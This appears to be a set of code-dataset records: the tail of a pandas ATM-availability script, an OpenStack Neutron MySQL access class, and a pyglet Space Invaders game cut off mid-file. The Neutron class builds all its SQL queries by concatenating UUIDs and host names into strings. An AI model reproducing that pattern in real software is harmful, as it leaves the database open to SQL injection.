df_atm_sw['SERVICE_END']\n df_atm_sw.loc[cond, 'SW_BEG'] = df_atm_sw.loc[cond, 'DAY']\n df_atm_sw.loc[cond, 'SW_END'] = df_atm_sw.loc[cond, 'DAY']\n\n df_atm_sw['SW_TIME'] = df_atm_sw['SW_END'] - df_atm_sw['SW_BEG']\n\n # print(df_atm_sw)\n # df_atm_sw.to_csv('data/df_atm_sw.csv', sep='\\t')\n return df_atm_sw\n\n\ndef calc_idle(reader, date_beg, date_end):\n\n df_atm_all = reader.get_atm()\n df_service = reader.get_service(date_beg, date_end)\n df_order = reader.get_orders(date_beg, date_end)\n\n df_atm = df_service.merge(df_atm_all, on=['ATM_REF']) #.set_index('ATM_REF', False)\n\n # Список дат для анализа\n days = dr.date_list(date_beg, date_end)\n df_day = pd.DataFrame({'DAY':[d for d in days]})\n df_day.DAY = pd.to_datetime(df_day.DAY) # Приведение к datetime\n df_day['WEEKDAY'] = df_day.DAY.dt.weekday + 1 # Опорное поле дней недели\n\n df_atm_sw = get_service_window(df_atm, df_day) # Рсчет сервисного окна для каждого УС\n\n # Расчет времени ремонта УС по дням\n df_order_day = get_order_day(df_order, df_day)\n df_atm_order = pd.merge(df_atm_sw, df_order_day, on=['ATM_REF', 'DAY']) #.set_index(['ATM_REF', 'DAY'], False)\n df_in_repair = get_in_repair(df_atm_order) # Длительная операция\n\n # Расчет времени доступности УС по дням\n df_idle = pd.merge(\n df_atm_sw[['ATM_REF', 'DAY', 'SW_BEG', 'SW_END', 'SW_TIME']],\n df_in_repair[['ATM_REF', 'DAY', 'REPAIR_BEG', 'REPAIR_END']],\n how='left',\n on=['ATM_REF', 'DAY']\n )\n df_idle['REPAIR_TIME'] = df_idle['REPAIR_END'] - df_idle['REPAIR_BEG']\n df_idle.loc[df_idle.REPAIR_TIME.isnull() & (df_idle.SW_TIME > pd.to_timedelta(0)), 'REPAIR_TIME'] = pd.to_timedelta(0)\n df_idle['AVAIL'] = 1 - (df_idle['REPAIR_TIME'] / df_idle['SW_TIME'])\n df_idle['DAY_DATE'] = df_idle.DAY.dt.date\n df_idle['DAY_MONTH'] = df_idle.DAY.dt.strftime('%Y.%m')\n df_idle['DAY_NUM'] = df_idle.DAY.dt.day\n\n # print(df_idle.info())\n # df_idle.to_csv('data/df_idle.csv', sep='\\t')\n\n df_atm_idle = df_atm[['ATM_REF', 'SERIAL', 'CITY', 'ADDR', 'MODEL']].merge(\n df_idle,\n how='left',\n on=['ATM_REF']\n # left_index=True,\n # right_index=True\n )\n\n df_atm_idle_pivot = df_atm_idle.pivot_table(index=['ATM_REF', 'SERIAL', 'CITY', 'ADDR', 'MODEL'], columns=['DAY_MONTH', 'DAY_NUM'], values=['AVAIL']) #.reset_index() #.set_index(['ATM_REF'])\n print(df_atm_idle_pivot)\n\n return df_atm_idle_pivot\n\n","repo_name":"privod/atm_chart","sub_path":"project/idle.py","file_name":"idle.py","file_ext":"py","file_size_in_byte":7947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12395461593","text":"__author__ = 'gpetralia'\n\nimport json\nfrom contextlib import closing\nimport mysql.connector as MySQLdb\n\n# MAP driver name to Neutron agent name\nMAP_DRIVER_BINARY = {\n 'openvswitch': 'neutron-openvswitch-agent'\n}\n\n\nclass NeutronDb():\n \"\"\"\n Exposes methods to get information regarding Neutron resources.\n It manages the connection to the Neutron DB.\n \"\"\"\n def __init__(self, host, usr, pwd, db):\n self.conn = None\n self.conn = MySQLdb.connect(host=host,\n user=usr,\n passwd=pwd,\n db=db)\n\n def get_routers(self, uuid=None):\n \"\"\"\n Return a dict containing the routers stored in Glance.\n If an UUID is given, it will return only the router with the given UUID\n :param uuid: Optional UUID of the desired router\n :return dict: contains routers information\n \"\"\"\n res = {}\n\n with closing(self.conn.cursor()) as cur:\n query = 'select * from routers left join ' \\\n 'routerl3agentbindings on routers.id = routerl3agentbindings.router_id'\n\n if uuid:\n query += ' where routers.id = \"' + uuid + '\"'\n\n cur.execute(query)\n\n for row in cur.fetchall():\n res[row[1]] = {}\n res[row[1]]['attributes'] = {}\n\n res[row[1]]['name'] = row[2]\n res[row[1]]['type'] = 'router'\n res[row[1]]['resource_type'] = 'virtual'\n res[row[1]]['category'] = 'network'\n res[row[1]]['attributes']['status'] = row[3]\n res[row[1]]['attributes']['admin_state_up'] = row[4]\n res[row[1]]['attributes']['gw_port_id'] = row[5]\n res[row[1]]['attributes']['enable_snat'] = row[6]\n res[row[1]]['attributes']['l3_agent_id'] = row[8]\n res[row[1]]['attributes']['ports'] = []\n port_query = 'select * from routerports where router_id=\"' + row[1] + '\"'\n cur.execute(port_query)\n for port_row in cur.fetchall():\n res[row[1]]['attributes']['ports'].append(port_row[1])\n\n return res\n\n def get_floating_ips(self, uuid=None):\n \"\"\"\n Return a dict containing the FloatingIPs stored in Neutron.\n If an UUID is given, it will return only the FloatingIP with the given UUID\n :param uuid: Optional UUID of the desired FloatingIP\n :return dict: contains FloatingIPs information\n \"\"\"\n res = {}\n with closing(self.conn.cursor()) as cur:\n query = 'select * from floatingips'\n if uuid:\n query += ' where id = \"' + uuid + '\"'\n\n cur.execute(query)\n\n for row in cur.fetchall():\n res[row[1]] = {}\n res[row[1]]['attributes'] = {}\n res[row[1]]['type'] = 'floatingip'\n res[row[1]]['resource_type'] = 'virtual'\n res[row[1]]['category'] = 'network'\n res[row[1]]['attributes']['floating_ip_address'] = row[2]\n res[row[1]]['attributes']['network_id'] = row[3]\n res[row[1]]['attributes']['port_id'] = row[4]\n res[row[1]]['attributes']['fixed_port_id'] = row[5]\n res[row[1]]['attributes']['router_id'] = row[7]\n sub_query = 'select mac_address from ports where id = \"' + row[4] + '\" '\n cur.execute(sub_query)\n for sub_row in cur.fetchall():\n res[row[1]]['attributes']['mac_address'] = sub_row[0]\n sub_query = 'select subnet_id from ipallocations where port_id = \"' + row[4] + '\" '\n cur.execute(sub_query)\n for sub_row in cur.fetchall():\n res[row[1]]['attributes']['subnet_id'] = sub_row[0]\n return res\n\n def get_ports_by_instance_uuid(self, instance_uuid):\n \"\"\"\n Return list of Neutron ports of the given nova instance.\n :param instance_uuid: UUID of the Nova Instance\n :return list: contains ports UUID\n \"\"\"\n res = []\n cur = self.conn.cursor()\n query = 'SELECT id FROM ports WHERE device_id = \"' + instance_uuid + '\"'\n cur.execute(query)\n for row in cur.fetchall():\n res.append(row[0])\n return res\n\n def get_ports(self, uuid=None):\n \"\"\"\n Return a dict containing the ports stored in Neutron.\n If an UUID is given, it will return only the port with the given UUID\n :param uuid: Optional UUID of the desired port\n :return dict: contains ports information\n \"\"\"\n res = {}\n\n with closing(self.conn.cursor()) as cur:\n query = 'select * from ports where device_owner != \"network:floatingip\"'\n if uuid:\n query += ' and id = \"' + uuid + '\"'\n\n cur.execute(query)\n\n for row in cur.fetchall():\n res[row[1]] = {}\n res[row[1]]['attributes'] = {}\n\n if row[2] != '':\n res[row[1]]['name'] = row[2]\n\n res[row[1]]['type'] = 'port'\n res[row[1]]['resource_type'] = 'virtual'\n res[row[1]]['category'] = 'network'\n res[row[1]]['attributes']['network_id'] = row[3]\n res[row[1]]['attributes']['mac_address'] = row[4]\n res[row[1]]['attributes']['admin_state_up'] = row[5]\n res[row[1]]['attributes']['status'] = row[6]\n res[row[1]]['attributes']['device_id'] = row[7]\n\n if row[8] != '':\n res[row[1]]['attributes']['device_owner'] = row[8]\n\n query = 'select * from ml2_port_bindings'\n\n cur.execute(query)\n\n for row in cur.fetchall():\n if row[0] in res.keys():\n if row[1] != '':\n res[row[0]]['hostname'] = row[1]\n res[row[0]]['attributes']['vif_type'] = row[2]\n res[row[0]]['attributes']['driver'] = row[3]\n res[row[0]]['attributes']['segment'] = row[4]\n res[row[0]]['attributes']['vnic_type'] = row[5]\n\n if row[6] != '':\n res[row[0]]['attributes']['vif_details'] = json.loads(row[6])\n if row[7] != '':\n res[row[0]]['attributes']['profile'] = row[7]\n\n query = 'select * from ipallocations'\n cur.execute(query)\n\n for row in cur.fetchall():\n if row[0] in res.keys():\n res[row[0]]['attributes']['ip_address'] = row[1]\n res[row[0]]['attributes']['subnet_id'] = row[2]\n\n for port in res.keys():\n if res[port]['attributes']['vif_type'] != 'unbound':\n host = res[port]['hostname']\n if res[port]['attributes']['driver'] in MAP_DRIVER_BINARY.keys():\n driver = res[port]['attributes']['driver']\n query = 'select id from agents where agents.host=\"' + host + \\\n '\" and agents.binary=\"' + MAP_DRIVER_BINARY[driver] + '\" LIMIT 1;'\n cur.execute(query)\n for row in cur.fetchall():\n res[port]['attributes']['agent_id'] = row[0]\n\n query = 'select * from floatingips'\n\n cur.execute(query)\n\n for row in cur.fetchall():\n if row[5] in res.keys():\n if 'floatingips' not in res[row[5]]['attributes'].keys():\n res[row[5]]['attributes']['floatingips'] = []\n res[row[5]]['attributes']['floatingips'].append(row[1])\n\n return res\n\n def get_agents(self, uuid=None):\n \"\"\"\n Return a dict containing the Neutron agents stored in Neutron.\n If an UUID is given, it will return only the agent with the given UUID\n :param uuid: Optional UUID of the desired agent\n :return dict: contains agents information\n \"\"\"\n res = {}\n with closing(self.conn.cursor()) as cur:\n\n query = 'select * from agents'\n\n if uuid:\n query += ' where id = \"' + uuid + '\"'\n\n cur.execute(query)\n\n for row in cur.fetchall():\n res[row[0]] = {}\n res[row[0]]['resource_type'] = 'service'\n res[row[0]]['name'] = row[1]\n res[row[0]]['hostname'] = row[4]\n res[row[0]]['category'] = 'network'\n res[row[0]]['type'] = row[2]\n res[row[0]]['attributes'] = {}\n res[row[0]]['attributes']['admin_state_up'] = row[5]\n res[row[0]]['attributes']['configurations'] = json.loads(row[10])\n return res\n\n def get_networks(self, uuid=None):\n \"\"\"\n Return a dict containing the networks stored in Neutron.\n If an UUID is given, it will return only the network with the given UUID\n :param uuid: Optional UUID of the desired network\n :return dict: contains networks information\n \"\"\"\n res = {}\n with closing(self.conn.cursor()) as cur:\n\n query = 'select n.id, n.name, n.status, n.admin_state_up, n.shared from networks n'\n\n if uuid:\n query += ' where n.id = \"' + uuid + '\"'\n\n cur.execute(query)\n\n for row in cur.fetchall():\n res[row[0]] = {}\n res[row[0]]['resource_type'] = 'virtual'\n res[row[0]]['name'] = row[1]\n res[row[0]]['type'] = 'net'\n res[row[0]]['category'] = 'network'\n res[row[0]]['attributes'] = {}\n res[row[0]]['attributes']['status'] = row[2]\n res[row[0]]['attributes']['admin_state_up'] = row[3]\n res[row[0]]['attributes']['shared'] = row[4]\n subnets = self.get_subnets_by_net_id(row[0])\n if subnets and len(subnets) > 0:\n res[row[0]]['attributes']['subnets'] = subnets\n\n query = 'select m.network_id, m.network_type, m.physical_network, ' \\\n 'm.segmentation_id, m.is_dynamic from ml2_network_segments m'\n\n if uuid:\n query += ' where m.network_id = \"' + uuid + '\"'\n\n cur.execute(query)\n for row in cur.fetchall():\n res[row[0]]['attributes']['network_type'] = row[1]\n res[row[0]]['attributes']['physical_network'] = row[2]\n res[row[0]]['attributes']['segmentation_id'] = row[3]\n res[row[0]]['attributes']['is_dynamic'] = row[4]\n\n query = 'select network_id, dhcp_agent_id from networkdhcpagentbindings'\n\n if uuid:\n query += ' where network_id = \"' + uuid + '\"'\n\n cur.execute(query)\n for row in cur.fetchall():\n res[row[0]]['attributes']['dhcp_agent_id'] = row[1]\n\n return res\n\n def get_subnets_by_net_id(self, net_id):\n \"\"\"\n Return a dict containing the Subnets stored in Neutron for a given Network.\n\n :param net_id: UUID of the desired Network\n :return dict: contains subnets information\n \"\"\"\n res = {}\n with closing(self.conn.cursor()) as cur:\n\n query = 'select * from subnets where network_id = \"' + net_id + '\"'\n\n cur.execute(query)\n\n for row in cur.fetchall():\n res[row[1]] = {}\n res[row[1]]['name'] = row[2]\n res[row[1]]['attributes'] = {}\n res[row[1]]['attributes']['ip_version'] = row[4]\n res[row[1]]['attributes']['cidr'] = row[5]\n res[row[1]]['attributes']['gateway_ip'] = row[6]\n res[row[1]]['attributes']['enable_dhcp'] = row[7]\n res[row[1]]['attributes']['shared'] = row[8]\n res[row[1]]['attributes']['ipv6_ra_mode'] = row[9]\n res[row[1]]['attributes']['ipv6_address_mode'] = row[10]\n dns_query = 'select * from dnsnameservers where subnet_id=\"' + row[1] + '\"'\n res[row[1]]['attributes']['dns_name_servers'] = list()\n cur.execute(dns_query)\n for dns_row in cur.fetchall():\n res[row[1]]['attributes']['dns_name_servers'].append(dns_row[0])\n routes_query = 'select * from subnetroutes where subnet_id=\"' + row[1] + '\"'\n res[row[1]]['attributes']['host_routes'] = list()\n cur.execute(routes_query)\n for routes_row in cur.fetchall():\n res[row[1]]['attributes']['host_routes'].append(\n {\n 'destination': routes_row[0],\n 'nexthop': routes_row[1]\n }\n )\n\n return res\n\n def get_subnets(self, uuid=None):\n \"\"\"\n Return a dict containing the Subnets stored in Neutron.\n If an UUID is given, it will return only the subnet with the given UUID\n :param uuid: Optional UUID of the desired subnet\n :return dict: contains subnets information\n \"\"\"\n res = {}\n with closing(self.conn.cursor()) as cur:\n\n query = 'select * from subnets'\n\n if uuid:\n query += ' where id = \"' + uuid + '\"'\n\n cur.execute(query)\n\n for row in cur.fetchall():\n res[row[1]] = {}\n res[row[1]]['resource_type'] = 'virtual'\n res[row[1]]['name'] = row[2]\n res[row[1]]['type'] = 'subnet'\n res[row[1]]['category'] = 'network'\n res[row[1]]['attributes'] = {}\n res[row[1]]['attributes']['network_id'] = row[3]\n res[row[1]]['attributes']['ip_version'] = row[4]\n res[row[1]]['attributes']['cidr'] = row[5]\n res[row[1]]['attributes']['gateway_ip'] = row[6]\n res[row[1]]['attributes']['enable_dhcp'] = row[7]\n res[row[1]]['attributes']['shared'] = row[8]\n res[row[1]]['attributes']['ipv6_ra_mode'] = row[9]\n res[row[1]]['attributes']['ipv6_address_mode'] = row[10]\n dns_query = 'select * from dnsnameservers where subnet_id=\"' + row[1] + '\"'\n res[row[1]]['attributes']['dns_name_servers'] = list()\n cur.execute(dns_query)\n for dns_row in cur.fetchall():\n res[row[1]]['attributes']['dns_name_servers'].append(dns_row[0])\n routes_query = 'select * from subnetroutes where subnet_id=\"' + row[1] + '\"'\n res[row[1]]['attributes']['host_routes'] = list()\n cur.execute(routes_query)\n for routes_row in cur.fetchall():\n res[row[1]]['attributes']['host_routes'].append(\n {\n 'destination': routes_row[0],\n 'nexthop': routes_row[1]\n }\n )\n\n return res\n","repo_name":"IntelLabsEurope/infrastructure-repository","sub_path":"monitoring_service/epa_database/openstack/neutron_db.py","file_name":"neutron_db.py","file_ext":"py","file_size_in_byte":15327,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"70831511773","text":"import random\n\nimport pyglet\nfrom pyglet.window import key\n\nclass _Shield(object):\n def __init__(self, x, y):\n self.x, self.y = x, y\n self.sprites = [\n None,\n pyglet.resource.image('shield_damlo.png'),\n pyglet.resource.image('shield_damhi.png'),\n pyglet.resource.image('shield_full.png'),\n pyglet.resource.image('shield_nw.png'),\n pyglet.resource.image('shield_ne.png'),\n ]\n self.states = [\n [0, 4, 3, 3, 3, 3, 5, 0],\n [4, 3, 3, 3, 3, 3, 3, 5],\n [3, 3, 0, 0, 0, 0, 3, 3],\n [3, 3, 0, 0, 0, 0, 3, 3],\n ]\n self.IW = self.sprites[3].width\n self.IH = self.sprites[3].height\n self.RC = range(len(self.states))\n self.CC = range(len(self.states[0]))\n self.width = len(self.states[0]) * self.IW\n def update(self):\n pass\n def paint(self):\n for s_r in self.RC:\n for s_c in self.CC:\n s = self.sprites[self.states[s_r][s_c]]\n x = self.x + s_c * self.IW\n y = self.y - s_r * self.IH\n if s: s.blit(x, y)\n def _reducedState(self, s, fromAbove):\n if s in [1, 2]:\n return 0\n elif s in [3, 4, 5]:\n return {True:1,False:2}[fromAbove]\n else:\n assert False\n def top(self):\n return self.y + self.IH\n def absorb(self, xl, yl, xh, yh, fromAbove):\n x = (xl + xh) / 2\n for r in self.RC:\n ry = self.y - r * self.IH\n if yl >= ry + self.IH: continue\n if yh < ry: continue\n for c in self.CC:\n cx = self.x + c * self.IW\n if not self.states[r][c]: continue\n if x < cx: continue\n if x >= cx + self.IW: continue\n s = self.states[r][c]\n self.states[r][c] = self._reducedState(s, fromAbove)\n return True\n def height(self):\n return self.IH * len(self.RC)\n def bitHeight(self):\n return self.IH\n def melt(self, invaderInvasionY):\n anythingMelted = False\n row = invaderInvasionY // self.IH\n if row < 0:\n return anythingMelted\n if row > len(self.states):\n row = len(self.states)\n for i_r in xrange(row):\n for i_c in self.CC:\n s = self.states[i_r][i_c]\n if s:\n anythingMelted = True\n self.states[i_r][i_c] = self._reducedState(s, True)\n return anythingMelted\n \nclass Shields(object):\n def __init__(self, window):\n sw = _Shield(0, 0).width\n pad = 128\n num = 4\n y = 96\n i_pad = (window.width - 2 * pad - sw) / (num-1)\n self.subs = [_Shield(pad + i_pad*i_x, y)\n for i_x in range(4)]\n self.top = self.subs[0].top()\n self.nextMelt = self.top\n def melt(self, invaderheight):\n anythingMelted = False\n if invaderheight < self.nextMelt:\n for s in self.subs:\n if s.melt(self.top - invaderheight):\n anythingMelted = True\n if not anythingMelted:\n self.nextMelt -= self.subs[0].bitHeight()\n return anythingMelted\n def absorbFromAbove(self, xl, yl, xh, yh):\n return self._absorb(xl, yl, xh, yh, True)\n def absorbFromBelow(self, xl, yl, xh, yh):\n return self._absorb(xl, yl, xh, yh, False)\n def _absorb(self, xl, yl, xh, yh, fromAbove):\n for s in self.subs:\n if s.absorb(xl, yl, xh, yh, fromAbove):\n return self\n return None\n def update(self):\n pass\n def paint(self):\n for s in self.subs:\n s.paint()\n\nclass Lives(object):\n PAD_OUTER = 3\n PAD_INNER = 1\n def __init__(self, window):\n self.liferepr = pyglet.resource.image('playerlife.png')\n self.count = 2\n self.x = window.width - (self.PAD_OUTER + self.liferepr.width)\n self.y = window.height - (self.PAD_OUTER + self.liferepr.height)\n def paint(self):\n for i in range(self.count):\n x = self.x - i * (self.PAD_INNER + self.liferepr.width)\n self.liferepr.blit(x, self.y)\n def update(self):\n pass\n def upOne(self):\n self.count += 1\n def loseOne(self):\n self.count -= 1\n\nclass Player(object):\n def __init__(self, window, keys):\n self.w = window\n self.k = keys\n self.gun = _Gun(window)\n self.s_alive = _AlivePlayer(window, keys, self.gun)\n self.s_dead = _DeadPlayer()\n self.state = self.s_alive\n def isHit(self, xl, yl, xh, yh):\n if self.state != self.s_alive: return None\n if self.s_alive.isHit(xl, yl, xh, yh):\n self.s_dead.init(self.s_alive.x, self.s_alive.y)\n self.state = self.s_dead\n return self\n return None\n def testGunHit(self, hitFuns):\n self.gun.testHit(hitFuns)\n def update(self):\n self.gun.update()\n if self.state == self.s_dead:\n if not self.state.stillDead:\n self.state = self.s_alive\n self.state.resurrect()\n self.state.update()\n def paint(self):\n self.gun.paint()\n self.state.paint()\n\nclass LostPlayer(object):\n def __init__(self, origPlayer):\n if origPlayer.state == origPlayer.s_alive:\n self.state = origPlayer.s_dead\n self.state.init(origPlayer.s_alive.x,\n origPlayer.s_alive.y)\n else:\n self.state = origPlayer.s_dead\n def isHit(self, xl, yl, xh, yh):\n return None\n def testGunHit(self, hitFuns):\n pass\n def update(self):\n self.state.update()\n def paint(self):\n self.state.paint()\n\nclass _DeadPlayer(object):\n ANIMSPEED = 3\n def __init__(self):\n self.anim = [\n pyglet.resource.image('playermelt01.png'),\n pyglet.resource.image('playermelt02.png'),\n pyglet.resource.image('playermelt03.png'),\n pyglet.resource.image('playermelt04.png'),\n ]\n self.a_tick = 0\n self.a_state = None\n self.stillDead = None\n self.x, self.y = 0, 0\n def init(self, x, y):\n self.x = x\n self.y = y\n self.a_state = 0\n self.stillDead = 30\n self.a_tick = self.ANIMSPEED\n def update(self):\n if self.stillDead: self.stillDead -= 1\n if self.a_state == None: return\n self.a_tick -= 1\n if self.a_tick: return\n self.a_tick = self.ANIMSPEED\n self.a_state += 1\n if self.a_state >= len(self.anim):\n self.a_state = None\n return\n def paint(self):\n if self.a_state == None: return\n self.anim[self.a_state].blit(self.x, self.y)\n \nclass _AlivePlayer(object):\n def __init__(self, window, keys, gun):\n self.w = window\n self.gun = gun\n self.s = pyglet.resource.image('player.png')\n self.x, self.y = self.w.width/2, 4\n self.keys = keys\n self.invulnerable = 0\n def resurrect(self):\n self.invulnerable = 50\n def update(self):\n if self.invulnerable:\n self.invulnerable -= 1\n vx = 0\n if self.keys[key.LEFT]: vx -= 10\n if self.keys[key.RIGHT]: vx += 10\n self.x += vx\n self.x = max(self.x, 0)\n self.x = min(self.x, self.w.width - self.s.width)\n if self.keys[key.SPACE]: self._pewpew()\n def isHit(self, xl, yl, xh, yh):\n if self.invulnerable: return False\n sxh = self.x+self.s.width\n syh = self.y+self.s.height\n if yl > syh: return False\n if yh < self.y: return False\n if xl > sxh: return False\n if xh < self.x: return False\n return True\n def paint(self):\n if self.invulnerable:\n if (self.invulnerable/5)%2:\n return\n self.s.blit(self.x, self.y)\n def _pewpew(self):\n self.gun.fire(self.x + (self.s.width/2), self.y + self.s.height)\n\nclass _Gun(object):\n COOLDOWN_MAX = 5\n def __init__(self, window):\n self.w = window\n self.s = pyglet.resource.image('pewpew.png')\n self.cx, self.cy = self.s.width/2, 0\n self.x, self.y = 0, 0\n self.firing = False\n self.cooldown = 0\n def fire(self, x, y):\n if self.firing: return\n if self.cooldown: return\n self.x = x - self.cx\n self.y = y - self.cy\n self.firing = True\n self.cooldown = self.COOLDOWN_MAX\n def update(self):\n if self.cooldown: self.cooldown -= 1\n if not self.firing: return\n self.y += 15\n if self.y > self.w.height:\n self.firing = False\n return\n def testHit(self, hitFun):\n if not self.firing: return\n if hitFun(self.x, self.y, self.x+self.s.width, self.y+self.s.height):\n self.firing = False\n def paint(self):\n if not self.firing: return\n self.s.blit(self.x, self.y)\n\nclass _InvaderExplode(object):\n def __init__(self):\n s = [pyglet.resource.image('invaderexplode0.png'),\n pyglet.resource.image('invaderexplode1.png')]\n self.x, self.y = 0, 0\n self.sm = {'inactive': {'d': 0, 'next': None, 's': None},\n 'explode0': {'d': 5, 'next': 'explode1', 's': s[0]},\n 'explode1': {'d': 10, 'next': 'inactive', 's': s[1]}}\n self.st = 'inactive'\n self.st_c = 0\n def trans(self, state):\n self.st = state\n self.st_c = self.sm[state]['d']\n def boom(self, x, y):\n self.x, self.y = x, y\n self.trans('explode0')\n def paint(self):\n s = self.sm[self.st]['s']\n if not s: return\n s.blit(self.x, self.y)\n def update(self):\n if not self.st_c: return\n self.st_c -= 1\n if self.st_c: return\n self.trans(self.sm[self.st]['next'])\n\nclass _InvaderZap(object):\n def __init__(self, window):\n self.w = window\n self.s = pyglet.resource.image('zapzap.png')\n self.cx, self.cy = self.s.width/2, 0\n self.xyl = []\n self.wh = (self.s.width, self.s.height)\n def fire(self, x, y):\n self.xyl.append([x - self.cx, y - self.cy])\n def update(self):\n for p in self.xyl: p[1] -= 10\n self.xyl = [p for p in self.xyl if p[1] > -self.s.height]\n def testHit(self, hitFuns):\n hitItems = []\n xyl2 = []\n for p in self.xyl:\n bounds = p[0], p[1], p[0]+self.s.width, p[1]+self.s.height\n hit = reduce(lambda a, f: a or f(*bounds), hitFuns, None)\n if hit:\n hitItems.append(hit)\n continue # shot absorbed\n xyl2.append(p)\n self.xyl = xyl2\n return hitItems\n def paint(self):\n for [x, y] in self.xyl:\n self.s.blit(x, y)\n\nclass Invaders(object):\n def __init__(self, window, diffLevel):\n self.w = window\n self.diffLevel = diffLevel\n self.ROWS = 6\n self.COLS = 8\n self.explode = _InvaderExplode()\n self.zap = _InvaderZap(window)\n self.invader0 = [\n pyglet.resource.image('invader01.png'),\n pyglet.resource.image('invader02.png')]\n self.iw, self.ih = self.invader0[0].width, self.invader0[0].height\n self.pad = 16\n self.x = 2 * self.pad\n self.y = self.w.height - (self.ih + 2 * self.pad)\n self.il = [[True]*self.COLS for _ in [None]*self.ROWS]\n self.bipbop = 0\n self.bipcnt = 0\n self.zapcnt = 100\n self.vx = self.iw/4\n self.vy = -(self.ih + self.pad)\n self.calcWidth()\n self.speed = self.calcSpeed()\n self.bottomBoundary = self.calcBottomBoundary()\n self.moving = True\n\n def reachedBottom(self):\n return self.bottomBoundary <= 0\n\n def calcBottomBoundary(self):\n bott = -1\n for i_r in xrange(len(self.il)):\n if max(self.il[i_r]):\n bott = i_r\n _, y = self.pos(bott, 0)\n return y\n \n def calcSpeed(self):\n def getDiffCurve():\n if self.diffLevel > 12:\n return [1, 2, 3, 4, 5, 6, 7]\n if self.diffLevel > 8:\n return [1, 2, 4, 5, 6, 8, 10]\n if self.diffLevel > 6:\n return [2, 4, 5, 6, 8, 10, 13]\n if self.diffLevel > 4:\n return [3, 5, 6, 8, 10, 13, 16]\n if self.diffLevel > 1:\n return [4, 6, 8, 10, 13, 16, 18]\n else:\n return [5, 7, 10, 13, 16, 18, 20]\n speeds = getDiffCurve()\n n = 0\n for r in xrange(self.ROWS):\n for c in xrange(self.COLS):\n if self.il[r][c]:\n n += 1\n if n < 2:\n return speeds[0]\n if n < 5:\n return speeds[1]\n if n < 10:\n return speeds[2]\n if n < 20:\n return speeds[3]\n if n < 30:\n return speeds[4]\n if n < 40:\n return speeds[5]\n else:\n return speeds[6]\n\n def collide(self, xl, yl, xh, yh):\n for i_r in xrange(self.ROWS):\n i_yl = self.y - (self.ih + self.pad) * i_r\n i_yh = i_yl + self.ih\n if yh < i_yl: continue\n if yl > i_yh: continue\n for i_c in xrange(self.COLS):\n i_xl = self. x + (self.iw + self.pad) * i_c\n i_xh = i_xl + self.iw\n if xh < i_xl: continue\n if xl > i_xh: continue\n if self.il[i_r][i_c]:\n self.il[i_r][i_c] = False\n self.explode.boom(i_xl, i_yl)\n self.speed = self.calcSpeed()\n self.bottomBoundary = self.calcBottomBoundary()\n self.reduceSizeIfNeeded()\n return True\n return False\n\n def allDead(self):\n return not self.COLS\n\n def removeZaps(self):\n self.zap = _InvaderZap(self.w)\n\n def reduceSizeIfNeeded(self):\n for i_c in [0, -1]:\n if not self.COLS: return\n if not sum([self.il[i_r][i_c]\n for i_r in range(self.ROWS)]):\n self.stripCol(i_c)\n self.reduceSizeIfNeeded()\n\n def stripCol(self, i_c):\n self.COLS -= 1\n for r in self.il:\n r.pop(i_c)\n if i_c == 0:\n self.x += self.iw + self.pad\n self.calcWidth()\n\n def calcWidth(self):\n self.totWidth = len(self.il[0]) * (self.iw + self.pad) - self.pad\n\n def getBottomOfRandomRow(self):\n candidates = []\n for i_c in xrange(self.COLS):\n for i_r in xrange(self.ROWS-1, -1, -1):\n if self.il[i_r][i_c]:\n candidates.append((i_r, i_c))\n break\n if not candidates:\n return None, None\n r, c = random.choice(candidates)\n x, y = self.pos(r, c)\n x += self.invader0[0].width / 2\n return x, y\n\n def update(self):\n self.explode.update()\n self.zap.update()\n self.bipcnt = (self.bipcnt + 1)%self.speed\n if self.bipcnt == 0:\n self.bipbop = (self.bipbop + 1)%2\n if self.moving:\n self.x += self.vx\n if (self.x + self.totWidth > self.w.width) or (self.x < 0):\n self.vx *= -1\n self.x += self.vx\n self.y += self.vy\n self.bottomBoundary = self.calcBottomBoundary()\n self.zapcnt -= 1\n if self.zapcnt == 0:\n self.zapcnt = random.randrange(10, 120)\n x, y = self.getBottomOfRandomRow()\n if x != None:\n self.zap.fire(x, y)\n\n def pos(self, r, c):\n return (self.x + c*(self.iw + self.pad),\n self.y - r*(self.ih + self.pad))\n\n def paint(self):\n def paintOne(row, col):\n x, y = self.pos(row, col)\n s = self.invader0[self.bipbop]\n s.blit(x, y)\n self.explode.paint()\n self.zap.paint()\n for ir in xrange(len(self.il)):\n row = self.il[ir]\n for ic in xrange(len(row)):\n row[ic] and paintOne(ir, ic)\n\nGAMEOVER_LABEL = pyglet.text.Label(\n 'GAME OVER',\n font_name=\"sans\",\n font_size=24,\n x=0, # set later\n y=0, # set later\n anchor_x=\"center\",\n anchor_y=\"center\") \nclass GameOver(object):\n def __init__(self, window):\n self.lbl = GAMEOVER_LABEL\n self.lbl.x = window.width//2\n self.lbl.y = window.height//2\n def update(self):\n pass\n def paint(self):\n self.lbl.draw()\n\nclass Level(object):\n def __init__(self, window):\n self.window = window\n self.value = 1\n self.lbl = self.mkLbl()\n self.fullYayWait = 60\n self.done = False\n def mkLbl(self):\n color = (255, 255, 255, 255)\n shinies = '%s'\n if self.value >= 2:\n shinies = shinies%'-%s-'\n if self.value >= 4:\n shinies = shinies%'=%s='\n if self.value >= 6:\n shinies = shinies%'<%s>'\n if self.value >= 8:\n shinies = shinies%'*%s*'\n if self.value >= 10:\n shinies = shinies%'>%s<'\n if self.value >= 12:\n shinies = shinies%'{%s}'\n if self.value >= 14:\n shinies = shinies%'~%s~'\n if self.value >= 16:\n shinies = shinies%'_%s_'\n if self.value >= 18:\n shinies = shinies%'/%s\\\\'\n if self.value >= 20:\n shinies = shinies%' %s '\n color = (238, 201, 0, 255) # gold!\n return pyglet.text.Label(\n shinies%('LEVEL %d'%self.value),\n font_name=\"sans\",\n font_size=15,\n x=self.window.width // 2,\n y=self.window.height,\n anchor_x=\"center\",\n anchor_y=\"top\",\n color=color)\n def up(self):\n self.value += 1\n self.lbl = self.mkLbl()\n def update(self):\n pass\n def paint(self):\n self.lbl.draw()\n\ndef _mkYayLbl(level):\n return pyglet.text.Label(\n 'YOU BEAT LEVEL %d'%level,\n font_name=\"sans\",\n font_size=50,\n x=0, # window.width // 2 later\n y=0, # window.height // 2 later\n anchor_x=\"center\",\n anchor_y=\"center\")\n_YAY_LABELS = [_mkYayLbl(n) for n in xrange(20)]\nclass YayYou(object):\n def __init__(self, window, level):\n global _YAY_LABELS\n while level >= len(_YAY_LABELS):\n 